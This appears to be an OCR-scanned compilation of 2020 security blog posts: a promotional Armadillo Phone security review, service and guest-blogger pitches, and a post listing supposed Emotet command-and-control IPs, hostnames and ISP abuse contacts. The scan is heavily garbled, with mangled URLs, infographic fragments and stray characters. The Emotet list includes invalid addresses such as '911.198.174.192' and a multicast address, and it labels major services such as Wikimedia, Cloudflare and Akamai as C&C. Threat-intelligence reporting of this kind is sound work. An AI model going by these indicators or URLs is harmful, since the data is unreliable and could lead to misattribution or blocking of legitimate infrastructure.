Space potentially signalling the presence of a sophisticated offensive cyber warfare adversary 
that’s truly capable of making an impact and causing havoc on a wide-spread scale. 


"ManTech has embraced the challenge of identifying and capturing the unique threats 
and vulnerabilities in the space domain with our newest offering, the ManTech Space Range. 
Built upon the success of ACRE®, ManTech’s innovative and fully operational cyber range, 
we are expanding our robust, scalable and hyper-realistic range to encompass the unique 
requirements of a cyber infrastructure supporting a space enterprise. ManTech’s ACRE range 
and highly trained team of space and cyber professionals are unrivaled within the IC and DoD. 
Our offense-informed cyber defense is an integral part of how we replicate any space, ground 
and network environment at any classification level to tackle today’s toughest cyber threats. 
MantTech’s Space Range provides “the right stuff” for customers to train to defend America’s 
vital space enterprise from the ground up. Most importantly, ManTech’s Space Range provides 
leaders with the confidence that critical soace communications, navigation and intelligence 
gathering capabilities will be available and reliable when needed most." 


A logical question emerges - what does really constitute a cyber war from Space? Man- 
Tech's initiative and research in this area can truly prove valuable to U.S National Security 
including its client-base for the purpose of empowering them with the necessary "know-how" 
and operational capabilities to launch offensive cyber warfare campaigns from Space. 


Stay tuned! 
1. https://1.bp.blogspot.com/-TrWdPYkvZ1M/XusZJcqDBcI/AAAAAAAAKOQ/F_o3KZI- Jnod670Qyv1I7SuA3e7hBvNeDwCLcBGASYHQ 


s1600/Space/2BRange.mp4_.Still003. jpg 
2 
3 
4. 
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5. https: //www.youtube.com/watch?v=H3NX17SQoDs 


16.10.4 The Armadillo Phone - A Security Review (2020-12-01 23:39) 


[1] 


Dear blog readers, 


As many of you know I’ve joined forces with [2]Team Armadillo Phone in the fight against 
cybercriminals including nation-state and rogue and malicious including possibly fraudulent 
cyber adversaries for the position of Security Blogger in 2019 and | wanted to say big thanks 
to COO [3]Rob Chaboyer and CEO [4]Kelaghn Noy for bringing me on board and for initiating 
a series of video conversations to better help them understand my motivation for joining the 
company and what exactly | can bring on board. 
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Among my first responsibilities were to possibly include an actual Security Audit and ac- 
tual Security Advice and Recommendation including practical implementation advice on new 
Privacy and Security themed related features actual reaching out to current and future cus- 


tomers including active posting of new and innovative Security Research at the [5]company’s 
blog. 


Technical and Qualitative Threat Modeling and Practical Security Audit of 
the Armadillo Phone - An Analysis 


30.10.2019 


Dancho Danchev 


In this post I’ll provide an in-depth Security Review of the Armadillo Phone in terms of Privacy 
and Security features including their relevance and importance in today’s modern cyber 
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threat adversaries dominated Internet-based communication ecosystem including an in-depth 
introduction into some of the key features that | might be definitely looking forward to 
implementing and offering practical advice on in terms of new Privacy and Security features 
that might greatly assist new and future customers on their way to achieve a decent degree 


of Pri 


vacy and Security in their Internet-based communications. 


Key Features of the Device include: 


- Tam 


per-Resistant Packing 


- Device Inspection 


- Secure Hardware 


- Multiple Passwords 


- Zero Day Protection 


- Security Peripherals 


Among my key proposals that | sincerely hope will eventually make their place on COO 
Rob Chaboyer and CEO Kelaghn Noy’s desk are: 
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Security Researcher Working Space or a Security Module - the basic idea here would be to 
offer a built-in full-disclosure reader application including automatic subscription to major 
and popular Information Security and Hacking Mailing Lists. 


Built-in RSS Reader - the main idea here would be offer Armadillo Phone users to ability 
to take advantage of a built-in RSS reader with pre-defined set of major and high-profile 
Security and Provicacy Content Providers 


Security and Privacy Including National-Security Journalists’ Opt-In Directory - have you 
ever wanted to directly reach out to a high-profile Security Privacy or National Security 
type of journalist for the purpose of sharing with them your opinion on a particular piece 
of to actually share a news tip? This is the main purpose behind this particular feature. 


Covert Channels - the main purpose behind this features is to allow Armadillo Phone users 
in particular journalists or hacktivists the opportunity to secure and convertly transmit 
information that’s basically impossible to track down intercept 


Steganography - the main purpose behind this feature is to allow Armadillo Phone users 
with the opportunity to use an alternative secure communication channel that’s basically 
impossible to intercept track down and censor 


Key Security and Privacy Features of the Device include: 


AES-256-XTS block-level FDE 

Block-level FDE instead of Android’s file-based encryption 
Scrypt work factors increased 

Minimum 8-character alphanumeric password 

Completely software-based 

Keymaster and gatekeeper disabled 

Normal password for deniable encryption 

Secret password stored at randomized offset 

Secret volume is hidden inside unused portion of decoy data 
Wipe password in footer to erase device 

Separate lockscreen password 

Password verification order randomized at runtime to prevent timing attacks 
Enhanced KASLR and userland ASLR 

Increased ASLR entropy 

Several PaX patches ported 

Zygote uses exec() spawning instead of fork() 

Improved SELinux rules 

Hardened malloc implementation 

Stack and heap canaries detect overflows 

Enhanced FORTIFY SOURCE implementation 

Function pointer protection 

Restrictive compile-time sanitization 

Additional attack surface reduction 


All connections made using pinned TLS 1.2 connections with high-entropy 4096-bit cer- 
tificates 


Metadata can be further protected by enabling optional VPN 
Verify encryption keys using manual verification, QR code, SMP or NFC 


Chat uses [7]OMEMO encryption 
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¢ Email uses PGP encryption 

¢ Email uses randomized subjects 

¢ Email uses encrypted connection to keyserver and mailserver 
¢ Email requires 4096-bit PGP keys 


¢ Radio Sentinel: Monitors WiFi networks for ARP poisoning. Monitors cellular networks 
for 2G networks, performs sanity checks and compares cellular towers to a database of 
known network 


* RAM Sentinel: Monitors temperature to prevent cold-boot attacks 


¢ Theft Sentinel: Connects to anti-theft beacon over BLE, alarms both beacon and phone 
if disconnected. If phone isn’t unlocked or beacon isn’t reconnected within 5 minutes 
the phone will shutdown. 


Based on my current experience with the device which I’ve recently started using for the pur- 
pose of keeping in touch with friends and colleagues | can easily say that this is one of the most 
advanced and technically sophisticated mobile security device that can be easily obtained from 
[8]here and | sincerely hope that my research and security knowledge and technical knowledge 
expertise will prove highly valuable to what the Team at Armadillo Phone are currently doing. 


Stay tuned! 


1. fietpa://4. bp. blogspot. con/~ayuitinar6£4/ aNGWSvxsHlL/AAAARAAATWO whe DTlsk i sB5pa747pQovblloze]ACLEDGASYA 

2, heeps://adanchev. blogspot con/7000/01/Joining- team-araadillo-phone_ neal 

3, htepe://nkedin,con/in/rob-chaboyed 

4, nevps://Linkedin.con/in/kelaghn-noy-S5a96505 

s, htape://awy.aruadillophone coa/ blog 

6. heeps://1.bp. blogspot .con/~JJHSp6KEQY al juIfOKI/AABAAARA wh U2 4c VzddEYRCDAWLq7~eDgbAL tBCkoQACLEBCASTHQ 
. https ://conversations. im/omemo/audit .pdf 


16.10.5 Joining Team Armadillo Phone! (2020-12-01 23:39) 


Hardware Storage 
Cameras and microphones removec Strongest storage encryption on the planet 


; Duress ord for decoy mode 
Complete device inspection 

Wipe password to erase device 
Tamper-resistant packaging 

Separate lockscreen password 


Software Communications 


»-tructe rypted calling 
Applications to protect your o-trust encrypted calling, 
A instant messaging and ema 
Armadillo Phone from attacks ‘ Bing and ¢ 


; Self-destructing messages, 
at Radio Sentinel: group chats, file transfers, k 
@* Cellular + Wi-Fi attacks 
P verification and remote erase 


=! f RAM Sentinel: @ Voice: 
= Temperature attacks LS ZRTP encryption 


Theft Sentinel: & ee 8 Ae, real Chat: 
LS Theft + forensic attacks ° : g- OMEMO encryption 


lesecute Secere Account Planning Meaa 


“= NFC Lock rh Email: 


Physical authentication y PGP-N encryption 
SFr Uke rf 


E 4 1@) 0 ef 
Accessories Privacy 


Anti-Theft Beacon: otect your data with your 


own private offshore server 


Sync with Theft Sentinel app 
a3 Anonymous prepaid SIM cards 
NFC Access Card: 


Authenticate with NFC Lock app ay in < 1, etherum or other methods 


Dear blog readers, 


It’s a pleasure and an honor to let you know that I’ve recently joined forces with Team 
[1]Armadillo Phone in the fight against sophisticated nation-state and rogue cyber threat 
actors for the position of Security Blogger targeting mobile devices on their way to compromise 
sensitive and often classified personal information and that I'll be definitely looking forward to 
making impact with the company through the publication of high-quality security and cyber 
threat research including the active education and spreading of information and knowledge to 
the company’s clients on their way to further protect their sensitive and often classified data 
from mobile threats courtesy of a multi-tude of malicious and fraudulent adversaries. 
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Among my responsibilities will include active cyber threat an nation and rogue cyber ad- 
versary research including actual client outreach in terms of Security Blogger including the 
actual work and eventual implementation of new never-published and seen-before privacy 
and security features including the actual Security Audit of the device in terms of possible 
Threat Modelling flaws and actual practical solution and advice-oriented implementation of 
new privacy and security features next to the usual cyber nation-state and rogue cyber actor 
type of threat analysis and research that I’ve been doing throughout the past decade. 


Perfect timing to say big thanks to COO [2]Rob Chaboyer and CEO [3]Kelaghn Noy for 
bringing me on board and for actually taking the time and effort to go through my proposal 
and actually initiate a video conversation with me for the purpose of working together. 


My initial idea would be reach out to the company’s client-base in terms of possible se- 
curity threats outreach including the active production of high-quality security and cyber 
adversary research targeting mobile devices at the [4]company’s blog including the pro- 
duction of a Threat Modelling Scenario Research Analysis which | intend to publish at the 
company’s blog including an actual practical and solution-oriented Security Audit of the device 
next to the actual introduction of new privacy and security features. 


| will be definitely looking forward to making an impact with the company and I'll be 
definitely looking forward to continue publishing the high-quality and never-published before 
type of research analysis at my personal blog. 


1. ipa / fou emmadilophone_ cond 

2, heepe: //Linkedin, con/in/rob~chaboyed 

3. https: //linkedin. com/in/kelaghn-noy-95a965b2 
4, https: //oww .arnadi Lophone .con/blog 


16.10.6 Anyone Using XMPP/OMEMO? (2020-12-01 23:40) 


[1] 
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ANPP 


Dear blog readers, 


Are you interested in catching up with me in terms of current and upcoming research in- 
cluding possible cybercrime research and commercial threat intelligence gathering services? 


Here’s my XMPP/OMEMO ID: dancho.danchev@kode.im 


Stay tuned! 
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1. https://1.bp. blogspot . com/-181n3WT2iHQ/XdQMOHmiCnI/AAAAAAAAJug/Zx1jR4B147QDzxfSaGLY 1KOzQwIEUInggCLcBGAsYHQ 
/s1600/Misc_03.png 


16.10.7 Guess Who’s Still Running the Show? (2020-12-01 23:42) 


[1] 


® Identified Competitors 
* Cyber Defense Agency (CDA) 
(US) 
Cyber Security Research and 
Development Center (US) 
Cyveillance (US) 
Dancho Danchev (EU) 


Department of Homeland 
Security US-CERT(US) 


Ernst & Young (EU) 


Competitors 


iDefense Labs (US) 

WET Intelligent Risk Systems (US) 
Informatica (US) 

IT — Information Sharing and 
Analysis Center (US) 

iSIGHT Partners (US) 
Lookingglass (US) 

Multi-State Information Sharing 
Analysis Center (US) 

nCircle (US) 


EWA Information and SecureWorks (US) 
Infrastructure Technologies, Inc. Trend Micro (US) 

(US) United States Cyber 
Fortify (US) Consequence Unit (US) 
Global Security Mag (EU) 


Dear blog readers, 


I’ve recently came across to a very [2]informative presentation courtesy of a friend [3]Jeffrey 
Carr from TaiaGlobal that lists me as a major competitor in Cyber Threat Intelligence next to 
the DHS. Outstanding! Keep it coming Jeff and don’t forget to check out this post detailing the 
inner workings of the infamous [4]Kneber Botnet. 


How to set them straight? Stay tuned! 


1. https://1.bp. blogspot .com/-ozjAj2qwmmc/XaZZ04QxN- I/AAAAAAAAJ£1/u2860B-U- yU849LtH5f inebysAKBsgJcQCLcBGAsYHQ 
/s31600/Jeffrey_Carr_Taia_Global_Competition. png 
2. https: //slideshare.net/jjarem63/grey-logic 
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3. https://jeffreycarr.blogspot .com/ 


4. https: //ddanchev. blogspot .com/2019/09/historical-osint-georgian-justice.htm 


16.10.8 Dancho Danchev’s Blog - Open Call for Blog Contributors and Guest Bloggers 
(2020-12-01 23:44) 


UPDATE: Do you know which is one of the World’s most popular Security blogs and who’s 
running it? 


Guess what - you've been reading it all along. Ever since | started this blog in December, 2005 
for the purpose of impressing my girlfriend and greatly inspired by a successful venture with 
Astalavista Security Group circa 2003-2006 I’ve received over 5M page views courtesy of a 
loyal base of users to whom | owe a great debt of gratitude for keeping track of my research 
and following my comments - in real-time. The time has come to expand and eventually launch 
a new Set of products and services including a possible Advertising Inventory - therefore I’ve 
decided to launch an Open Call for Blog Contributors including Guest Bloggers. Interested in 
writing at this blog? Feel free to approach me - dancho.danchev@hush.com 


Dancho Danchev’s Blog - Major Security Web Property Statistics: 


[1] 


Users Sessions Bounce Rate Session Duration 
2.5K 3K 15.47% 1m 03s 
467.5% 465.3% + 67.5% 20.0% 
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United States 
India 


Germany 


ft M H 


United Kingdom 
France 
Australia 


Brazil 


BOeE 


Saudi Arabia 


oO 
= 
= 


Canada 


[2] 1 Italy 


[3] 


2% 88 followers |El 1450 posts H ocomments 


AllTime 5358874 © Today 1357 © Yesterday 1346 © This Month 25780 © 


LastMonth 35491 © 


[4] 
8764 


Dancho Danchev's Blog - Mind Streams of Information Security Knowledge 


Views 

150K 

125K 

sant 5.36M © 

75K J 

50K 0m 

25K 

° “jan2011. Jan. Jan Jan Jan Jan Jan Jan Jan 

2012 «2013S 2014S 20152016. «= 2017S «2018 = 2019 
[5] 
Top Referrers Absolute numbers » 

@ www.google.com 112K 
@  ddanchev.blogspot.com 38.3K 
@ _ feeds.feedburner.com 37K 
@ _ feedproxy.google.com 16.8K 
@ t.co 16.6K 
@ _ biaogingsoso.com 16.3K 
@ www.google.co.uk 14.4K 
i) www.zdnet.com 11K 
@_  wewwedroot.com 8.15K 
©) Other 5.09M 
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[6] 


Top Referrering URLs 
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Entry 


http://feeds. feedburner.com/DanchoDanchevOnSecurityAndNewMedia 
https://www.google.com/ 

http://biaogingsoso.com/ 

http://www.google.com 

http://ddanchev.blogspot.com/ 
http://www.google.co.uk/url?sa=t&source=web&cd=1 
https://t.co/ZodagOciGq 

feedproxy.google.com 

Nachobot: http://www.feedspot.com 


Other 


[7] 


5106 


5245149 


Audience 


Pageviews by Browsers 


«\ 


[8] 


Firefox 


MSIE 


Chrome 


Safari 


Apple-PubSub 


Opera 


Thunderbird 


GranParadiso 


Lightning 


Other 


Absolute numbers ~ 


8767 


8768 


Pageviews by Operating Systems 


\ 


[9] 


Windows 


Linux 


Macintosh 


X11 


Android 


iPhone 


Unix 


iPad 


Windows NT 6.1 


Other 


3.04M 


1M 


836K 


70.9K 


49.5K 


48.3K 


44.3K 


19.2K 


3.9K 


241K 


06. How much would you or your organization be willing to invest in order to obtain ac- 
cess to the service? 


Looking forward to receiving your access request including possible discount-based Christmas 
season type of commercial partnership requests at dancho.danchev@hush.com 


Stay tuned! 


1. https://ddanchev.blogspot.com/2018/09/introducing-threat-data-worlds-most .html 


16.10.10 Threat Intelligence - An Adaptive Approach to Information Security - Free 
Consultation Available (2020-12-01 23:47) 


[1] 
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Dear, blog, readers, as, of, today, I’m, making, publicly, available, my, portfolio, of, ser- 
vices, including, active, threat, intelligence, gathering, and, processing, cybercriminals, and, 
network, assets, profiling, real, life, personalization, of, malicious, actors, OSINT, analyses, 
in-depth, understanding, and, processing, of, tactics, techniques, and, procedures (TTPs), 
including, the, production, of, custom, timely, and, relevant, managed, or, on, demand, 
client-tailored, reports, and, analysis, briefs, covering, managed, security, blogging, and, 
conference, attendance, cybercrime, malware, botnets, and, threat, intelligence, including, 
the, coverage, of, geopolitically, relevant, cyber, threat, assessments. 


The, portfolio, of, services, includes, but, is, not, limited, to: 


Real-time, managed, or, on, demand, analysis, briefs, and, reports, production: 


- analysis, briefs, and, timely, and, relevant, reports, covering, cybercrime, malware, bot- 
nets, and, threat, intelligence, including, but, not, limited, to, tactics, techniques, and, 
procedures (TTPs), real, life, personalization, of, cybercriminals, and, network, assets 


Geopolitically, relevant, and, geographically, selected, threat, intelligence, processing, 
and, gathering, relevant, reports: 


- geopolitically, relevant, coverage, of, selected, geographic, regions, covering, cybercrime, 
malware, botnets, and, threat, intelligence, including, but, limited, to, tactics, techniques, and, 
procedures (TTPs), real, life, personalization, of, cybercriminals, and, network assets 


Managed, security, blogging, and, presentation, conference, attendance: 


- threat, intelligence, processing, as, a, service, including, but, not, limited, to, the, man- 
aged, processing, and, communication, of, threat, intelligence, gathering, and, processing, 
information, in, the, form, of, managed, communication, to, a, selected, set, of, audiences, 
including, but, not, limited, to, security, blogging, and, conferences, attendance, on, behalf, 
of, a, selected, enterprise, further, positioning, its, understanding, and, reaching, out, to, 
selected, clients 


Managed, tactics, techniques, and, procedures (TTPs), processing, managing, and, gather- 
ing, analysis, and, reports: 


- in-depth, understanding, of, tactics, techniques, and, procesures (TTPs), relevant, to, a, 


specific, cybercrime, group, geopolitically, relevant, region, or, a, selected, geographically, 
relevant, region 


Approach me at dancho.danchev@hush.com 
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Enjoy! 


1. https://3.bp.blogspot .com/-DeJVFQ6dRBs/WDzOpISsF81/AAAAAAAAHTO/£4YVbrWxF 2YNepf-Kz4G1dKHgTT j 8LSf£gCLcB/s1600 
Threat _Intelligence_Cybercrime_Botnet_Malware_Managed 


16.10.11 Exposing Emotet’s Modern Infrastructure - A Case Study on Tracking Down 
and Shutting Down Abusive Malware In Direct Cooperation with Abuse De- 
partments (2020-12-01 23:55) 


[1] 


In this post I'll officially attempt to bring down and take offline the Emotet botnet including to 
actually provide never-published before OSINT type of research analysis on the actual C &C 
infrastructure behind the Emotet botnet which is one of the most prolific botnets up to 
present day with the idea to attempt a coordinated take down attempt in direct cooperation 
with multiple international ISPs and their associated abuse departments for the purpose of 
bringing it offline. 


[2] 


Host distribution by ISP 


YOU Broaddand 4 
ASMALLORANGE? 
Contabo Gmbh 


SYN LTD 
EDLAYER-AS:1 
2cOm Host 


Sample Emotet known C &C infrastructure servers: 


hxxp://109.123.78.10 
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hxxp://66.54.51.172 
hxxp://108.161.128.103 
hxxp://195.210.29.237 
hxxp://5.35.249.46 
hxxp://5.159.57.195 
hxxp://206.210.70.175 
hxxp://88.80.187.139 
hxxp://188.93.174.136 
hxxp://130.133.3.7 
hxxp://162.144.79.192 
hxxp://79.110.90.207 
hxxp://72.18.204.17 
hxxp://212.129.13.110 
hxxp://66.228.61.248 
hxxp://193.171.152.53 
hxxp://129.187.254.237 
hxxp://178.248.200.118 
hxxp://133.242.19.182 
hxxp://195.154.243.237 
hxxp://80.237.133.77 
hxxp://158.255.238.163 
hxxp://91.198.174.192 
hxxp://46.105.236.18 
hxxp://205.186.139.105 
hxxp://72.10.49.117 
hxxp://133.242.54.221 
hxxp://198.1.66.98 
hxxp://148.251.11.107 
hxxp://213.208.154.110 
hxxp://192.163.245.236 
hxxp://88.80.189.50 
hxxp://185.46.55.88 
hxxp://173.255.248.34 
hxxp://104.219.55.50 
hxxp://200.159.128.19 
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hxxp://198.23.78.98 
hxxp://70.32.92.133 
hxxp://192.163.253.154 
hxxp://192.138.21.214 
hxxp://106.187.103.213 
hxxp://162.144.80.214 
hxxp://128.199.214.100 
hxxp://69.167.152.111 
hxxp://46.214.107.142 
hxxp://195.154.176.172 
hxxp://106.186.17.24 
hxxp://74.207.247.144 
hxxp://209.250.6.60 
hxxp://142.34.138.90 
hxxp://74.217.254.29 
hxxp://212.48.85.224 
hxxp://167.216.129.13 
hxxp://91.194.151.38 
hxxp://162.42.207.58 
hxxp://104.28.17.67 
hxxp://8.247.6.134 
hxxp://5.9.189.24 
hxxp://78.129.213.41 
hxxp://184.86.225.91 
hxxp://107.189.160.196 
hxxp://88.208.193.123 
hxxp://50.56.135.44 
hxxp://184.106.3.194 
hxxp://185.31.17.144 
hxxp://67.19.105.107 
hxxp://218.185.224.231 


[3] 
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Host distribution by country 


Including the following C &C infrastructure servers part of Emotet’s C &C infrastructure: 


103.201.150.209 
104.131.11.150 
104.131.208.175 
104.236.151.95 
104.236.246.93 
104.236.99.225 
105.224.171.102 
109.104.79.48 
109.73.52.242 
111.67.12.221 
112.72.9.242 
115.124.109.85 
115.71.233.127 
117.218.133.244 
125.99.106.226 
125.99.61.162 
128.199.78.227 
134.196.209.126 
136.243.177.26 
138.201.140.110 
138.219.214.164 
138.68.106.4 
142.4.198.249 
142.93.88.16 
144.139.247.220 
147.135.210.39 
149.62.173.247 
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159.203.204.126 
159.65.241.220 
159.65.25.128 
162.144.119.216 
162.217.250.243 
162.243.125.212 
167.114.210.191 
169.239.182.217 
170.247.122.37 
173.212.203.26 
174.136.14.100 
175.100.138.82 
176.250.213.131 
176.31.200.136 
177.242.214.30 
177.246.193.139 
178.62.37.188 
178.79.161.166 
178.79.163.131 
179.14.2.75 
179.32.19.219 
179.40.105.76 
181.134.105.191 
181.15.180.140 
181.15.243.22 
181.16.127.226 
181.171.118.19 
181.189.213.231 
181.198.67.178 
181.231.72.200 
181.28.144.64 
181.28.248.205 
181.39.134.122 
181.48.174.242 
183.82.97.25 
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185.129.93.140 
185.86.148.222 
185.94.252.27 
186.138.56.183 
186.144.64.31 
186.22.209.16 
186.23.146.42 
186.23.18.211 
186.4.167.166 
186.4.234.27 
186.83.133.253 
186.86.177.193 
187.149.41.205 
187.163.180.243 
187.163.222.244 
187.178.9.19 
187.188.166.192 
187.189.195.208 
187.242.204.142 
188.166.253.46 
189.180.84.115 
189.196.140.187 
189.209.217.49 
190.1.37.125 
190.102.226.91 
190.112.228.47 
190.113.233.4 
190.117.206.153 
190.145.67.134 
190.147.12.71 
190.186.203.55 
190.186.221.50 
190.189.112.116 
190.189.204.100 
190.19.42.131 
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190.193.131.141 
190.230.60.129 
190.246.166.217 
190.25.255.98 
190.36.88.98 
190.55.39.215 
190.72.136.214 
190.97.10.198 
191.97.116.232 
195.242.117.231 
196.6.112.70 
197.211.244.6 
198.58.114.91 
200.107.105.16 
200.123.101.90 
200.24.248.206 
200.28.131.215 
200.32.61.210 
200.43.231.10 
200.57.102.71 
200.58.171.51 
200.58.83.179 
200.80.198.34 
200.85.46.122 
201.199.89.223 
201.212.24.6 
201.219.183.243 
201.220.152.101 
201.231.44.78 
201.238.152.20 
201.251.229.37 
201.252.229.169 
202.83.16.150 
203.25.159.3 
205.186.154.130 
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206.189.98.125 
211.63.71.72 
212.71.234.16 
213.120.104.180 
216.98.148.136 
216.98.148.156 
217.113.27.158 
217.13.106.160 
217.92.171.167 
219.74.237.49 
222.214.218.136 
222.214.218.192 
225.153.252.228 
77.122.183.203 
109.123.78.10 
66.54.51.172 
108.161.128.103 
195.210.29.237 
5.35.249.46 
5.159.57.195 
206.210.70.175 
88.80.187.139 
188.93.174.136 
130.133.3.7 
162.144.79.192 
79.110.90.207 
72.18.204.17 
212.129.13.110 
66.228.61.248 
193.171.152.53 
129.187.254.237 
178.248.200.118 
133.242.19.182 
195.154.243.237 
80.237.133.77 
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158.255.238.163 
911.198.174.192 
46.105.236.18 
205.186.139.105 
72.10.49.117 
133.242.54.221 
198.1.66.98 
148.251.11.107 
213.208.154.110 
192.163.245.236 
88.80.189.50 
185.46.55.88 
173.255.248.34 
104.219.55.50 
200.159.128.19 
198.23.78.98 
70.32.92.133 
192.163.253.154 
192.138.21.214 
106.187.103.213 
162.144.80.214 
128.199.214.100 
69.167.152.111 
46.214.107.142 
195.154.176.172 
106.186.17.24 
74.207.247.144 
209.250.6.60 
142.34.138.90 
74.217.254.29 
212.48.85.224 
167.216.129.13 
91.194.151.38 
162.42.207.58 
104.28.17.67 
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8.247.6.134 
5.9.189.24 
78.129.213.41 
184.86.225.91 
107.189.160.196 
88.208.193.123 
50.56.135.44 
184.106.3.194 
185.31.17.144 
67.19.105.107 
218.185.224.231 


Sample actionable intelligence on Emotet’s C &C infrastructure: 


[4] 


[5] 


[6] 


[7] 
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[8] 


Abuse Departments Primary Contact Points Involved in this Take Down Campaign Include: 
noc@premianet.com 
eig-abuse@endurance.com 
cschelp@gov.bc.ca 
complaints@cari.net 
abuse@youbroadband.in 
abuse@websupport.sk 
abuse@webfusion.com 
abuse@vps.net 
abuse@trueinternet.co.th 
abuse@tpnet.co.nz 
abuse@telstra.net 
abuse@telkomsa.net 
abuse@tektonic.net 
abuse@softlayer.com 
abuse@skymedia.mn 
abuse@sky.uk 
abuse@rackspace.com 
abuse@ovh.net 
abuse@ovh.ca 
abuse@nextlayer.at 
abuse@netnames.com 
abuse@mediatemple.net 
abuse@lrz.de 
abuse@liquidweb.com 
8788 


abuse@linode.com 
abuse@hetzner.com 
abuse@hathway.net 
abuse@fu-berlin.de 
abuse@fasthosts.co.uk 
abuse@expedient.com 
abuse@dxc.com 
abuse@dion.ne.jp 
abuse@digitalocean.com 
abuse@contabo.de 
abuse@cloudflare.com 
abuse@btopenworld.com 
abuse@bluehost.com 
abuse@atlantic.net 
abuse@as47195.net 
abuse@akamai.com 
abuse@actcorp.in 
abuse@123-reg.co.uk 
sainfo@netsuite.com 
support@premianet.com 
noc@inap.com 
noc@cybertrails.net 
ipaddressing@level3.com 
info@mellowhost.com 
ipadmin@gov.bc.ca 
network@cari.net 
admin@armourcloud.io 
gr.sridhar@youbroadband.co.in 
info@websupport.sk 
abuse@uk2group.com 
ipadmin@trueinternet.co.th 
tim@initech.co.nz 
addressing@telstra.net 
pieter@saix.net 
abuse@telekom.de 
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matta@tektonic.net 
abuse@ta.telecom.com.ar 
ipadmin@softlayer.com 
curtis1977@us.ibm.com 
soyoloo@skymedia.mn 
hostmaster@sky.uk 
abuse@rapidswitch.com 
hostmaster@rackspace.com 
noc@ovh.net 
abuse@online.net 
ripe@online.net 
noc@nextlayer.at 
sys-ripe@netnames.com 
dnsadmin@mediatemple.net 
ipadmin@lrz.de 
ipadmin@liquidweb.com 
support@linode.com 
abuse@hostturka.com 
abuse@hostopia.com.au 
ripe@hetzner.com 
abuse@hekko.pl 
vijaym@hathway.net 
admin-c@fu-berlin.de 
networks@fasthosts.com 
ipm@expedient.com 
abuse@esds.co.in 
ipaddr@dxc.com 
rir@cloudflare.com 
btretail.ipam@bt.com 
eig-net-team@endurance.com 
eig-noc@endurance.com 
ip-admin@atlantic.net 
noc@as47195.net 
ip-admin@akamai.com 
tech.support@incredible.actcorp.in 
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ip-admin@actcorp.in 
ripe@webfusion.com 
sknetwork2012@gmail.com 
hostmaster@twl-kom.de 

idc _sales@daou.co.kr 
hostmaster@bsnl.in 
alejandro@patagoniadata.com.ar 
jpinazo@axarnet.es 
hello@syn.one 
operations@hostafrica.co.za 
nestorbonfante66@gmail.com 
nic tech@megacable.com.mx 
ipadmin@tigo.com.co 
admin.internet.co@telefonica.com 
tasamail.ar@telefonica.com 
adminternet@une.net.co 
noc@megaservers.de 
wimpie@letaba.net 
andrew.alston@liquidtelecom.com 
domains@send.itto.us 
tech@duruan.co.kr 
albert@web.am 

pda@1b.hu 
hostmaster@singnet.com.sg 
anti-spam@ns.chinanet.cn.net 
avmc@ctvnet.dp.ua 
d.pastian@terralink.de 
claude.demuth@lu-cix.lu 
scharwitzl@bmlv.gv.at 
bz@giganet.hu 
mass-ripe@heg.com 
noc@wikimedia.org 
hostmaster@nic.ad.jp 
noc@digitalocean.com 


noc@next-gen.ro 
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rir-admin@fastly.com 

Sample hostnames acting as Emotet C &C infrastructure servers: 
zabbix-sakura2.anthill.jp 
www.zedat.fu-berlin.de 
www.snowmobile.gov.bc.ca 
www.netdoktor.at 

www.cceca.ca 

www.bmlv.gv.at 

www-riedle.transfermarkt.de 
wp308.webpack.hosteurope.de 
vps.cournoyer17.info 
vmh17370.hosting24.com.au 
vmd61678.contaboserver.net 
universidadedoingles.com.br 

twojj.com 

trc-200-107-105-16.trcnet.com.ar 
text-lb.esams.wikimedia.org 

testwerk.org 
static.ob.ahd.117.218.133.244.bsnl.in 
static.24.189.9.5.clients. your-server.de 
static.110.140.201.138.clients.your-server.de 
static.107.11.251.148.clients. your-server.de 
static-ip-cr1901471271.cable.net.co 
static-ip-cablemodem-190.186.221.50.cotas.com.bo 
static-ip-cablemodem-190.186.203.55.cotas.com.bo 
static-ip-adsl-200.58.171.51.cotas.com.bo 
static-200-58-83-179.supernet.com.bo 
static-190-25-255-98.static.etb.net.co 
snaplive.org 

shopping.netsuite.com 
server90240.uk2net.com 
server88-208-193-123.live-servers.net 
server.driveclassic.com 

sapper.ethii.com 
rtw7-rfpn.accessdomain.com 
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rs250366.rs.hosteurope.de 
roadbikesales.com.au 
rmolina.mx 
rb2.leevee.it 
popdesigngroup.com 
pd95caba7.dip0.t-ipconnect.de 
ovz06.gamesdom.com 
ny-1.robbiebyrd.com 
ns2.hospemex.com 
ns2.datatrust.com.br 
niotek.vservers.es 
mail2.rhubarb-cs.com 
mail.ps4hacked.es 
mail.behaplastik.com 
lvps109-104-79-48.vps.webfusion.co.uk 
li89-144.members.linode.com 
1i695-139.members.linode.com 
li616-91.members.linode.com 
1i318-248.members.linode.com 
li3301-131.members.linode.com 
li299-166.members.linode.com 
lasvegas-nv-datacenter.com 
israel-studies.com 
ip.77.122.183.203.dynamic.krr.volia.net 
host90.200-123-101.static.telmex.net.ar 
host37.170-247-122.netacebal.com.ar 
host233-004.vccfranck.com.ar 
host22.181-15-243.telecom.net.ar 
host213-120-104-180.in-addr.btopenworld.com 
host190.102.226.91.dynamic.pacificonet.cl 
host181-189-213-231.wilnet.com.ar 
host169.201-252-229.telecom.net.ar 
host140.181-15-180.telecom.net.ar 
host129.190-230-60.telecom.net.ar 
host.thehiddencollective.com 
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host-186-4-234-27.netlife.ec 
host-186-4-167-166.netlife.ec 
host-181-16-127-226.telered.com.ar 
hirlevel.uniweb.hu 

hh4.secureserver.net.nz 

h2041.gfsrv.net 

gbg1.0x0.network 
fixed-187-189-195-208.totalplay.net 
enterprise.hellokrd.net 
dynamic-ip-18686177193.cable.net.co 
dynamic-ip-18683133253.cable.net.co 
dynamic-ip-1861446431.cable.net.co 
dsrecordings.com 
dsl-189-180-84-115-dyn.prod-infinitum.com.mx 
dsl-187-149-41-205-dyn.prod-infinitum.com.mx 
dmj.southo.net 
dinamic-tigo-179-14-2-75.tigo.com.co 
customer.megaservers.de 
customer-tgz-204-142.megared.net.mx 
customer-smal-140-187.megared.net.mx 
customer-qro-214-30.megared.net.mx 
customer-col-193-139.megared.net.mx 
customer-201-219-183-243.megacable.com.ar 
cpe-190-55-39-215.telecentro-reversos.com.ar 
cpe-186-23-18-211.telecentro-reversos.com.ar 
cpe-186-23-146-42.telecentro-reversos.com.ar 
cpe-186-22-209-16.telecentro-reversos.com.ar 
comadosa.mx 
cm-134-196-209-126.revip18.asianet.co.th 
cable-181-134-105-191.une.net.co 
bscloud.vps.wbsprt.com 

bsbdb01.bsb.Irz.de 

broadband.actcorp.in 

bcairquality.ca 
bb219-74-237-49.singnet.com.sg 
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bOfad583.bb.sky.com 
